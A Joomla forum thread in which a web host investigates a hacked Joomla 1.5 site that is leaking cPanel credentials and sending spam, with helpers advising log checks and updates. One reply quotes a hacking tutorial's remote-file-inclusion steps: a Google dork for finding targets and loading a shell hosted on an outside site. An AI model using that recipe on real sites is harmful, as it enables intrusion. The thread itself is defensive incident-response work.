[solved] Finding the entry point of the hack
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
[solved] Finding the entry point of the hack
Hello guys,
Straight to the subject:
We are the host and we have a hacked website. The webmaster said this :"our site is security level 5 and we know that is technically impossible to insert files in the server through the website". <- no comments about this
Due to this issue our server is going down a lot since last week when we discovered the hack, and we have mail spam going out of the server.
Searching the website foulder we found a few files with malicious code.
I need help to find out how the hacker placed those files in the server.
What kinda of the attack was ?
Was really a entry point through the website?
Anyway I need more information and I prefer advices / suggestions / ideas from this forum because I need prepare a proper answer to our client.
The website is Joomla 1.5 and already check with the jts-post_1.1.1 script, to see the 3rd party components / modules, there are not in the vulnerable extension list.
Can I paste here the php code that we found?
The files is CPhack.php.
I hope to wrote a clear explanation, if not , just say so and I will try my best in the next post.
Straight to the subject:
We are the host and we have a hacked website. The webmaster said this :"our site is security level 5 and we know that is technically impossible to insert files in the server through the website". <- no comments about this
Due to this issue our server is going down a lot since last week when we discovered the hack, and we have mail spam going out of the server.
Searching the website foulder we found a few files with malicious code.
I need help to find out how the hacker placed those files in the server.
What kinda of the attack was ?
Was really a entry point through the website?
Anyway I need more information and I prefer advices / suggestions / ideas from this forum because I need prepare a proper answer to our client.
The website is Joomla 1.5 and already check with the jts-post_1.1.1 script, to see the 3rd party components / modules, there are not in the vulnerable extension list.
Can I paste here the php code that we found?
The files is CPhack.php.
I hope to wrote a clear explanation, if not , just say so and I will try my best in the next post.
- alikon
- Joomla! Champion
- Posts: 5941
- Joined: Fri Aug 19, 2005 10:46 am
- Location: Roma
- Contact:
Re: Finding the entry point of the hack
have you heard about RFI ?we know that is technically impossible to insert files in the server through the website
read this on wikipedia
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
- Delete ALL the folders and files on the server. That's ALL the folders and files.
(you can leave the configuration.php if you physically inspect it). - Check ALL the computers that have server access for malware etc. That's ALL the computers that have server access .
- Change your passwords.
- Use the files from the Joomla full package to upload to the server. All except the /installation folder.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Yes sir, I did.
And that particular article made me post here.
I want to know exactly how the attack happened to prevent future problems and learn.
I'm studying the case, just need a few directions.
Just learned, seems to be 3 injection attacks but I looking for the entry.
I checked this so far:
http://docs.joomla.org/Security_Checkli ... rver_Setup
http://forum.joomla.org/viewtopic.php?f=432&t=590555
and others
and meanwhile our server administrator is running a few countermeasures.
And that particular article made me post here.
I want to know exactly how the attack happened to prevent future problems and learn.
I'm studying the case, just need a few directions.
Just learned, seems to be 3 injection attacks but I looking for the entry.
I checked this so far:
http://docs.joomla.org/Security_Checkli ... rver_Setup
http://forum.joomla.org/viewtopic.php?f=432&t=590555
and others
and meanwhile our server administrator is running a few countermeasures.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Finding the entry point of the hack
Running and posting the jts results will help give a clue to what's going on.
Checklist 7 is also a good read.
Checklist 7 is also a good read.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Thank you for the replies .
Webdongle, I checked the link you posted before but I want to know how this happened.
We are not going to wipe the joomla from our server yet, the webmaster is "trying" to clean his work. He is not from our company.
We trying to figure what is happenning to our server.
We think, the hacker got in the website, placed a files to do brute force and use our server to send spams.
I will paste the code here.
Webdongle, I checked the link you posted before but I want to know how this happened.
We are not going to wipe the joomla from our server yet, the webmaster is "trying" to clean his work. He is not from our company.
We trying to figure what is happenning to our server.
We think, the hacker got in the website, placed a files to do brute force and use our server to send spams.
I will paste the code here.
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Mandville, thank you.
Yes I did it too. I saw your posts around.
I cant use the script right now because the webmaster put the site in off .
Here what I have now.
Yes I did it too. I saw your posts around.
I cant use the script right now because the webmaster put the site in off .
Here what I have now.
Last edited by alikon on Tue Aug 02, 2011 7:19 pm, edited 1 time in total.
Reason: hack code removed
Reason: hack code removed
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
I can´t post the script info yet, meanwhile...
this file I posted is the CPhack.php we found in the root folder in the website.
this file I posted is the CPhack.php we found in the root folder in the website.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
Which site ? The one that should have been deleted or the files from a fresh Joomla full package ?rodajr wrote:....
I cant use the script right now because the webmaster put the site in off .
...
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
The hacked one.
Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.
Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
Ok, am with it now.rodajr wrote:....
Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.
The jts post assistant will run even if the site is set Offline. The question is do you have the right to run it on the server to (what can only be described as) spy on his setup ? If you tick the boxes it will tell you a lot of info. Including all the extensions used. That way you can see if he is using any extensions on the VEL And a wealth of other information.
You do not have the required permissions to view the files attached to this post.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
isnt running. the websmaster working
this is the msg
jtablesession::Store Failed
DB function failed with error number 145
Table './our_bd/jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '84b058cd0196f4b1d2153b97ae52cf32','1312317081','','0','1','0' )
this is one of our problems, the webmaster , our client hired him.
PS: the "dude" doesn't know what happen and he is saying is a issue on our server. He tried to fix some joomla data base problem. oh boy!! this is going to be a hell of week (
The webmaster is trying to put the fault on us .
this is the msg
jtablesession::Store Failed
DB function failed with error number 145
Table './our_bd/jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '84b058cd0196f4b1d2153b97ae52cf32','1312317081','','0','1','0' )
this is one of our problems, the webmaster , our client hired him.
PS: the "dude" doesn't know what happen and he is saying is a issue on our server. He tried to fix some joomla data base problem. oh boy!! this is going to be a hell of week (
The webmaster is trying to put the fault on us .
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
But it ran before ? I tested on a 1.5 local install with site Offline and it worked for me. So if it worked before then someone has messed with something on the site or in the database.
Addendum
Have you checked the access logs for ../../../../ type paths ?
Addendum
Have you checked the access logs for ../../../../ type paths ?
Last edited by Webdongle on Tue Aug 02, 2011 9:07 pm, edited 1 time in total.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Yes, it ran.
I checked all their components on the extension list about vunerabilites.
We have to wait the dam guy fix what he is trying to do
it is complicated.
Well meanwhile, we changed the password of all emails from the client due to the warning of spam.
We put some brute protection on. So far, 6 hours without problems on the server.
Coincidence or not, the website was off line too.
I checked all their components on the extension list about vunerabilites.
We have to wait the dam guy fix what he is trying to do
it is complicated.
Well meanwhile, we changed the password of all emails from the client due to the warning of spam.
We put some brute protection on. So far, 6 hours without problems on the server.
Coincidence or not, the website was off line too.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
Have you checked the access logs for ../../../../ type paths ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Ok guys. I will not update until tomorrow.
Thank you for all replies and attention. Talk to you in a bit.
cya
Thank you for all replies and attention. Talk to you in a bit.
cya
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
hello guys,
I did it.
So, our server was up for about 12 hours then the webmaster put his joomla on and our server went down again
I did it.
JTS-post Diagnostic Information wrote:Joomla! Version: AIserver .0 Production/Stable [ Khepri ] Agosto-2008 23:55 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-194.26.1.el5xen ( x86_64) | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 ( http://******) | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): No | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 30 seconds | File Uploads: Enabled
MySQL Version: 5.0.92-community ( Localhost via UNIX socket )
JTS-post Extended Information wrote:SEF: Disabled | Legacy Mode: N/A | FTP Layer: N/A | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi | MySQLi: No | Max. Memory: 32M | Max. Upload Size: 2M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.92 ( latin1 )
So, our server was up for about 12 hours then the webmaster put his joomla on and our server went down again
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Finding the entry point of the hack
I do not recognise that version of joomla. Nothing we current support is that old.
I would be tempted to surrende your client again unless they used a current secure version.
I would be tempted to surrende your client again unless they used a current secure version.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
http://docs.joomla.org/Khepri_Template_CSS
Oct 2008
http://www.projectamplify.com/joomla-15 ... plate.html
Looks like it is an Administrator Template that some people install outside of the /administrator Sounds like a possible way for a site to be hacked from ?
Oct 2008
http://www.projectamplify.com/joomla-15 ... plate.html
http://joomlawebhosting.ca/index.php?op ... whitelabelSince this is a core file it's best to copy this file to the root of the default front end template and then make edits. This will override the file at templates/system/offline.php
Looks like it is an Administrator Template that some people install outside of the /administrator Sounds like a possible way for a site to be hacked from ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
We did a test with the file we found, CPhack.php.
This is a method to get the cpanel login and so on.
Just open a page in the website showing informations and not saving in a file inside the server. The file has an encrypted part with this informations:
Ok. Fact: Someone found a entry in the website, did a php injection, put the file into the server (website folder), got information and started to use our server as a spam sender.
Questions remains:
- still, what entry point?
- why our server goes down because of it? (when the website was offline, and I say about his data base, the server stood up, running normal and not sending spam out )
We are cheking logs and monitoring.
This is a method to get the cpanel login and so on.
Just open a page in the website showing informations and not saving in a file inside the server. The file has an encrypted part with this informations:
Ok. Fact: Someone found a entry in the website, did a php injection, put the file into the server (website folder), got information and started to use our server as a spam sender.
Questions remains:
- still, what entry point?
- why our server goes down because of it? (when the website was offline, and I say about his data base, the server stood up, running normal and not sending spam out )
We are cheking logs and monitoring.
Last edited by mandville on Wed Aug 03, 2011 6:13 pm, edited 1 time in total.
Reason: removed script
Reason: removed script
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
What extensions were installed ?
are there any ../../../ type url's in the logs ?
are there any ../../../ type url's in the logs ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
I will do a list of what they have on it
************
Administrator Components
Component Name Version Author Author Site Type
Polls v1.5.0 Joomla! Project www.joomla.org Core
This component manages polls...
Banners v1.5.0 Joomla! Project www.joomla.org Core
This component manages banners and banner clients...
HsConfig v1.0.3 Ken Lowther www.joomlanook.com 3rd Party
ccNewsletter v1.0.4 Stable AI www.aiserver.com.br 3rd Party
Sistema de newsletter...
Contact Items v1.0.0 Joomla! Project www.joomla.org Core
Parameters for individual Contact Items...
Contact v1.5.0 Joomla! Project www.joomla.org Core
This component shows a listing of Contact Information...
Trash v1.0.0 Joomla! Project www.joomla.org Core
PARAMTRASH...
Frontpage v1.5.0 Joomla! Project www.joomla.org Core
This Component shows all the published Articles from your site marked Show on Front Page....
Configuration Manager v1.5.0 Joomla! Project www.joomla.org Core
Configuration Manager...
JCE v1.5.7 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE ADMIN DESC...
Media Manager v1.5.0 Joomla! Project www.joomla.org Core
This component manages site media...
Zoo v1.0.4 YOOtheme www.yootheme.com 3rd Party
Zoo Joomla 1.5 component from YOOtheme.com (http://www.yootheme.com)...
Cache Manager v1.5.0 Joomla! Project www.joomla.org Core
Cache Manager...
Language Manager v1.5.0 Joomla! Project www.joomla.org Core
Language Manager...
User Manager v1.5.0 Joomla! Project www.joomla.org Core
User Manager...
Plugin Manager v1.5.0 Joomla! Project www.joomla.org Core
Plugin Manager...
Module Manager v1.5.0 Joomla! Project www.joomla.org Core
Module Manager...
Installation Manager v1.5.0 Joomla! Project www.joomla.org Core
Installation Manager...
Menus Manager v1.5.0 Joomla! Project www.joomla.org Core
Menu Manager...
Search v1.5.0 Joomla! Project www.joomla.org Core
DESCSEARCH...
Messaging v1.5.0 Joomla! Project www.joomla.org Core
Messaging...
Template Manager v1.5.0 Joomla! Project www.joomla.org Core
Template Manager...
Control Panel v1.5.0 Joomla! Project www.joomla.org Core
The Control Panel is the Home Page of the Joomla! Administrator Back-end...
Mass Mail v1.5.0 Joomla! Project www.joomla.org Core
DESCMASSMAIL...
Content Page v1.5.0 Joomla! Project www.joomla.org Core
DESCCONTENT...
Done Processing Administrator Components
Site Components
Component Name Version Author Author Site Type
Wrapper v1.5.0 Joomla! Project www.joomla.org Core
Wrapper...
MailTo v1.5.0 Joomla! Project www.joomla.org Core
A generic mail to friend component...
User v1.5.0 Joomla! Project www.joomla.org Core
User Self-Management...
Done Processing Site Components
Administrator Modules
Module Name Version Author Author Site Type
Done Processing Administrator Modules
Site Modules
Modules Name Version Author Author Site Type
Done Processing Site Modules
Site Plugins
Plugin Name Version Author Author Site Type
Editor - XStandard Lite for Joomla! v1.0 Joomla! Project www.joomla.org Core
DESCXSTANDARD
Editor - JCE 1.5.6 v1.5.6 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE EDITOR DESC
Editor - None v1.0 3rd Party
This loads a basic text entry field
Editor - TinyMCE 3 v3.2.6 Moxiecode Systems AB tinymce.moxiecode.com/ 3rd Party
DESCTINYMCE
Content - Load Modules v1.5 Joomla! Project www.joomla.org Core
DESCLOADPOSITION
Content - Highslide v2.0.0 Ken Lowther www.joomlanook.com 3rd Party
HIGHSLIDE
Content - Vote v1.5 Joomla! Project www.joomla.org Core
Add the Voting functionality to Items
Content - Code Highlighter (GeSHi) v1.5 Joomla! Project qbnz.com/highlighter Core
DESCGESHI
Content - Example v1.0 Joomla! Project www.joomla.org Core
An example content plugin
Content - Email Cloaking v1.5 Joomla! Project www.joomla.org Core
DESCMOSEMAILCLOAK
Content - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCCONTENTPAGEBREAK
Content - KA Facebook Comments v1.5.x.2.3 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
KAFACEBOOKCOMMENTSPLG_INSTALLATION
Content - Page Navigation v1.5 Joomla! Project www.joomla.org Core
DESCPAGENAVIGATION
System - Modal Popup Content v1.0 DoJoomla www.dojoomla.com 3rd Party
Modal Popup Content
System - Log v1.5 Joomla! Project www.joomla.org Core
Provides system logging
AIeffects v1.5.0 FNC www.aiserver.com.br 3rd Party
AIeffects plugin
System - Remember Me v1.5 Joomla! Project www.joomla.org Core
Provides remember me functionality
System - Legacy v1.5 Joomla! Project www.joomla.org Core
Provides legacy support for older version of Joomla!
System - Cache v1.5 Joomla! Project www.joomla.org Core
Provides page caching
System - Backlinks v1.5 Joomla! Project www.joomla.org Core
Provides backlink support
System - SEF v1.5 Joomla! Project www.joomla.org Core
DESCPLGSYSTEMSEF
System - JavaScript SDK v1.5.x.3.3.1 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
JASCRIPTSDK_INSTALLATION
System - Debug v1.5 Joomla! Project www.joomla.org Core
Provides debug information
User - Example v1.0 Joomla! Project www.joomla.org Core
An example user synchronisation plugin
User - Joomla! v1.5 Joomla! Project www.joomla.org Core
PLG_USER_JOOMLA
Search - Sections v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Content Section information
Search - Weblinks v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Weblinks Component
Search - Contacts v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Contacts Component
Search - Newsfeeds v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Newsfeeds
Search - Content v1.5 Joomla! Project www.joomla.org Core
ALLOWS SEARCHING OF ALL ARTICLES
Search - Zoo v1.0.2 YOOtheme www.yootheme.com 3rd Party
Zoo Search Joomla 1.5 plugin from YOOtheme.com (http://www.yootheme.com)
Search - Categories v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Categories information
XML-RPC - Blogger API v1.0 Joomla! Project www.joomla.org Core
Blogger XML-RPC API
XML-RPC - Joomla API v1.0 Joomla! Project www.joomla.org Core
Joomla! XML-RPC API
Button - Image v1.0.0 Joomla! Project www.joomla.org Core
DESCIMAGE
Button - Readmore v1.5 Joomla! Project www.joomla.org Core
DESCREADMORE
Button - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCPAGEBREAK
Authentication - Example v1.5 Joomla! Project www.joomla.org Core
An example of an authentication plugin
Authentication - LDAP v1.5 Joomla! Project www.joomla.org Core
Handles user authentication against an LDAP server
Authentication - Joomla v1.5 Joomla! Project www.joomla.org Core
Handles Joomlas default user authentication
Authentication - GMail v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with a GMail account
Authentication - OpenID v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with an OpenID (Requires PHP5)
************
Administrator Components
Component Name Version Author Author Site Type
Polls v1.5.0 Joomla! Project www.joomla.org Core
This component manages polls...
Banners v1.5.0 Joomla! Project www.joomla.org Core
This component manages banners and banner clients...
HsConfig v1.0.3 Ken Lowther www.joomlanook.com 3rd Party
ccNewsletter v1.0.4 Stable AI www.aiserver.com.br 3rd Party
Sistema de newsletter...
Contact Items v1.0.0 Joomla! Project www.joomla.org Core
Parameters for individual Contact Items...
Contact v1.5.0 Joomla! Project www.joomla.org Core
This component shows a listing of Contact Information...
Trash v1.0.0 Joomla! Project www.joomla.org Core
PARAMTRASH...
Frontpage v1.5.0 Joomla! Project www.joomla.org Core
This Component shows all the published Articles from your site marked Show on Front Page....
Configuration Manager v1.5.0 Joomla! Project www.joomla.org Core
Configuration Manager...
JCE v1.5.7 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE ADMIN DESC...
Media Manager v1.5.0 Joomla! Project www.joomla.org Core
This component manages site media...
Zoo v1.0.4 YOOtheme www.yootheme.com 3rd Party
Zoo Joomla 1.5 component from YOOtheme.com (http://www.yootheme.com)...
Cache Manager v1.5.0 Joomla! Project www.joomla.org Core
Cache Manager...
Language Manager v1.5.0 Joomla! Project www.joomla.org Core
Language Manager...
User Manager v1.5.0 Joomla! Project www.joomla.org Core
User Manager...
Plugin Manager v1.5.0 Joomla! Project www.joomla.org Core
Plugin Manager...
Module Manager v1.5.0 Joomla! Project www.joomla.org Core
Module Manager...
Installation Manager v1.5.0 Joomla! Project www.joomla.org Core
Installation Manager...
Menus Manager v1.5.0 Joomla! Project www.joomla.org Core
Menu Manager...
Search v1.5.0 Joomla! Project www.joomla.org Core
DESCSEARCH...
Messaging v1.5.0 Joomla! Project www.joomla.org Core
Messaging...
Template Manager v1.5.0 Joomla! Project www.joomla.org Core
Template Manager...
Control Panel v1.5.0 Joomla! Project www.joomla.org Core
The Control Panel is the Home Page of the Joomla! Administrator Back-end...
Mass Mail v1.5.0 Joomla! Project www.joomla.org Core
DESCMASSMAIL...
Content Page v1.5.0 Joomla! Project www.joomla.org Core
DESCCONTENT...
Done Processing Administrator Components
Site Components
Component Name Version Author Author Site Type
Wrapper v1.5.0 Joomla! Project www.joomla.org Core
Wrapper...
MailTo v1.5.0 Joomla! Project www.joomla.org Core
A generic mail to friend component...
User v1.5.0 Joomla! Project www.joomla.org Core
User Self-Management...
Done Processing Site Components
Administrator Modules
Module Name Version Author Author Site Type
Done Processing Administrator Modules
Site Modules
Modules Name Version Author Author Site Type
Done Processing Site Modules
Site Plugins
Plugin Name Version Author Author Site Type
Editor - XStandard Lite for Joomla! v1.0 Joomla! Project www.joomla.org Core
DESCXSTANDARD
Editor - JCE 1.5.6 v1.5.6 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE EDITOR DESC
Editor - None v1.0 3rd Party
This loads a basic text entry field
Editor - TinyMCE 3 v3.2.6 Moxiecode Systems AB tinymce.moxiecode.com/ 3rd Party
DESCTINYMCE
Content - Load Modules v1.5 Joomla! Project www.joomla.org Core
DESCLOADPOSITION
Content - Highslide v2.0.0 Ken Lowther www.joomlanook.com 3rd Party
HIGHSLIDE
Content - Vote v1.5 Joomla! Project www.joomla.org Core
Add the Voting functionality to Items
Content - Code Highlighter (GeSHi) v1.5 Joomla! Project qbnz.com/highlighter Core
DESCGESHI
Content - Example v1.0 Joomla! Project www.joomla.org Core
An example content plugin
Content - Email Cloaking v1.5 Joomla! Project www.joomla.org Core
DESCMOSEMAILCLOAK
Content - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCCONTENTPAGEBREAK
Content - KA Facebook Comments v1.5.x.2.3 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
KAFACEBOOKCOMMENTSPLG_INSTALLATION
Content - Page Navigation v1.5 Joomla! Project www.joomla.org Core
DESCPAGENAVIGATION
System - Modal Popup Content v1.0 DoJoomla www.dojoomla.com 3rd Party
Modal Popup Content
System - Log v1.5 Joomla! Project www.joomla.org Core
Provides system logging
AIeffects v1.5.0 FNC www.aiserver.com.br 3rd Party
AIeffects plugin
System - Remember Me v1.5 Joomla! Project www.joomla.org Core
Provides remember me functionality
System - Legacy v1.5 Joomla! Project www.joomla.org Core
Provides legacy support for older version of Joomla!
System - Cache v1.5 Joomla! Project www.joomla.org Core
Provides page caching
System - Backlinks v1.5 Joomla! Project www.joomla.org Core
Provides backlink support
System - SEF v1.5 Joomla! Project www.joomla.org Core
DESCPLGSYSTEMSEF
System - JavaScript SDK v1.5.x.3.3.1 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
JASCRIPTSDK_INSTALLATION
System - Debug v1.5 Joomla! Project www.joomla.org Core
Provides debug information
User - Example v1.0 Joomla! Project www.joomla.org Core
An example user synchronisation plugin
User - Joomla! v1.5 Joomla! Project www.joomla.org Core
PLG_USER_JOOMLA
Search - Sections v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Content Section information
Search - Weblinks v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Weblinks Component
Search - Contacts v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Contacts Component
Search - Newsfeeds v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Newsfeeds
Search - Content v1.5 Joomla! Project www.joomla.org Core
ALLOWS SEARCHING OF ALL ARTICLES
Search - Zoo v1.0.2 YOOtheme www.yootheme.com 3rd Party
Zoo Search Joomla 1.5 plugin from YOOtheme.com (http://www.yootheme.com)
Search - Categories v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Categories information
XML-RPC - Blogger API v1.0 Joomla! Project www.joomla.org Core
Blogger XML-RPC API
XML-RPC - Joomla API v1.0 Joomla! Project www.joomla.org Core
Joomla! XML-RPC API
Button - Image v1.0.0 Joomla! Project www.joomla.org Core
DESCIMAGE
Button - Readmore v1.5 Joomla! Project www.joomla.org Core
DESCREADMORE
Button - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCPAGEBREAK
Authentication - Example v1.5 Joomla! Project www.joomla.org Core
An example of an authentication plugin
Authentication - LDAP v1.5 Joomla! Project www.joomla.org Core
Handles user authentication against an LDAP server
Authentication - Joomla v1.5 Joomla! Project www.joomla.org Core
Handles Joomlas default user authentication
Authentication - GMail v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with a GMail account
Authentication - OpenID v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with an OpenID (Requires PHP5)
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
None of those appear to be up to date versions.
What about your access logs ? any ../../../../ type entries ?
What about your access logs ? any ../../../../ type entries ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
guys,
I'm already looking for but do you have something about shell c99?
We decrypted a code and that was a known name.
I know this is a tool for RFI. I need more safe material to study.
I'm already looking for but do you have something about shell c99?
We decrypted a code and that was a known name.
I know this is a tool for RFI. I need more safe material to study.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
http://www.hackcommunity.com/Thread-How ... -shell-c99use google to find site vulnerability: inurl:index.php?page=
Try the site is vulnerability just delete and replace http://www.google.com
example: http://www.vulnerabilitysite.com/index.php?page=HERE REPLACE!http://www.google.com then press enter if you get site like a google then site is vulnerability!Upload shell on http://www.110mb.com and replace url: http://www.google.com and that's it!
http://www.exploit-db.com/exploits/17603/
http://www.[youtube].com/watch?v=ylDzxXez ... re=related
Drag the bar about 2/3 along and watch how it's put in. Then you will see why I ask about access logs with ../../../../ in the url
http://www.[youtube].com/watch?v=o4NtQvgv ... re=related
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Webdongle,
Thank you dude! Really appreciate all your replies.
I couldnt check logs, my co worker is on the server duty.
I was researching and studying the code.
Now I understand what you were asking me. I'll ask for all the logs we can get.
Question 1, can I find logs in joomla too? I'm not expert in Joomla, have been studying about 2 months. Just started to learn the code in it.
I checked the basic folders.
Question 2 (I still reading and watching the material you linked) The hacked website was using SEF, even with this can be use the injection on the url?
Thank you dude! Really appreciate all your replies.
I couldnt check logs, my co worker is on the server duty.
I was researching and studying the code.
Now I understand what you were asking me. I'll ask for all the logs we can get.
